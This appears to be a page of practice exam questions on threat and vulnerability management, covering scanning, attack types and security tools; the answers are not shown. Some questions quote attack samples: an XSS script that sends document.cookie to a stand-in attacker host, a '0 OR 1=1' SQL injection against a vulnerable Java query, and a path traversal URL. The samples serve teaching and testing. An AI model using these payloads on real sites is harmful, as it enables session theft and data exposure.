Exam simulator: Threat and Vulnerability Management

In the cybersecurity and threat intelligence industries, there are several approaches used to analyze and track the characteristics of cyber intrusions by advanced threat actors. Which of the following approaches emphasizes the relationships and characteristics of four basic components: the adversary, capabilities, infrastructure, and victims?

While you were interpreting Assessment Reports on Acunetix Vulnerability Scanner you identified a vulnerability in the system with a Common Vulnerability Scoring System (CVSS) value of (L) and a score (0.395). Based on the given scenario, which of the following statements would be true?

You open the command prompt and type the following command to find out which ports on your system are open.

lsof -Pn -i4 | grep LISTEN

After typing the command you receive the following results.

127.0.0.1:22 (LISTEN)
127.0.0.1:53 (LISTEN)
127.0.0.1:68 (LISTEN)
127.0.0.1:25 (LISTEN)

Which of the following services are not currently running on your system? (Choose all that apply)

You have been hired as a security analyst to conduct a source code analysis on different websites. After spending hours to find out if the sites are compromised or not, you notice the following code snippet:

 "http://www.client-website.com/search? < script >location.href='http://www.villainsite.com/hijacker.php?cookie='+document.cookie; < / script >"

Which of the following attacks the attacker is trying to conduct on your client’s website?

You just completed an HPING scan and received the following output:

HPING 4.2.2.1 (eth1 4.2.2.1): S set, 40 headers + 0 data bytes
len=46 ip=4.2.2.1 ttl=56 DF id=32839 sport=50 flags=RA seq=0 win=0 rtt=264.3 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32840 sport=51 flags=RA seq=1 win=0 rtt=277.6 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32841 sport=52 flags=RA seq=2 win=0 rtt=285.4 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32842 sport=53 flags=SA seq=3 win=49312 rtt=270.7 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32843 sport=54 flags=RA seq=4 win=0 rtt=225.1 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32844 sport=55 flags=RA seq=5 win=0 rtt=202.6 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32845 sport=56 flags=RA seq=6 win=0 rtt=196.7 ms

Based on these results, which of the following services returned an SYN-ACK?

Which of the following threat actor terms is the act of breaking into a computer system, for politically or socially motivated purposes?

The developer of your company wrote the following code snippet in Java to show the account numbers and balances for the current user’s id as provided in a URL.

String accountBalanceQuery = 
  "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " 
  + request.getParameter("user_id");

    Statement statement = connection.createStatement();
    ResultSet rs = statement.executeQuery(accountBalanceQuery);
    while (rs.next()) {
        page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance"));
    }

Under normal operation, the user with ID 4 might be logged in, and visit the URL: https://mybank.ebanking/show_balances?user_id=4. This means that accountBalanceQuery would end up being:

SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 4

A cyber security criminal changed the parameter “user_id” to be interpreted as:

0 OR 1=1

When this query is passed to the database, it returns all the account numbers and balances it has stored, and rows are added to the page to show them. The attacker now knows every user’s account numbers and balances. Which of the following attacks is conducted against the website?

The Internet of things (IoT) is a network of physical objects that are embedded with sensors, software, and other technologies for the purpose of connecting and exchanging data with other devices and systems over the Internet. Which of the following statements is NOT considered an IoT threat and vulnerability.

Your company is using a Web Vulnerability Scanner tool named Acunetic to check whether your website and web applications are vulnerable. While you were reviewing a scan report you saw the following URL:

http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1

What type of attack is conducted on that website?

An organization has hired a cybersecurity analyst to conduct an assessment of its current wireless network security. He has been tasked with capturing the inbound and outbound packets and exporting the data to text files for further processing through third-party tools. Which of the following tools should the analyst use to complete the task?

You have been hired as a cybersecurity analyst to conduct an assessment against the organization’s network. Now you are in the process of trying to discover as many attack vectors as possible that can be used to exploit the systems further. Which of the following is the phase you are currently in?

In which of the following types of attacks the unauthorized user gains access to a system or network and remains there for an extended period of time without being detected with the main goal to steal data instead of causing damage to the network or system?

Your company has moved any workload from its on-premises environment to Amazon Web Services (AWS) to benefit from substantial IT cost savings, business agility, and operational resilience. You have been tasked with recommending a tool that enables security posture assessment of cloud environments. Which of the following tools should you recommend for completing the task?

You are working on an application with multiple serverless functions and your task is to deploy a REST API using Serverless, Express, and Node.js. Which of the following actions should you perform to ensure that a vulnerability in one function doesn’t escalate and compromise others as well?

Which of the following tools are infrastructure vulnerability scanners? (Choose all that apply)

The developer of your company is writing software in C language. As he is a junior software engineer he needs your help to choose secure functions for his projects. Which of the following functions he shouldn’t use as it is considered an insecure function?

Which of the following monitoring solutions should you implement that provides the most accurate and updated information about any vulnerabilities present in a given system?

A malicious user exploited a bug in a system and gained elevated access to resources that should normally be unavailable to him. Which type of attack was conducted in that system?

Active Vulnerability Scanners identify the active operating systems, applications, and ports throughout a network and provide information about weaknesses but they can’t take any action to resolve security problems. (True/False)

A telecom company may promise network availability of 99.999 percent and allow the customer to reduce their payment by a given percentage if that is not achieved. Which of the following agreements is described in this example?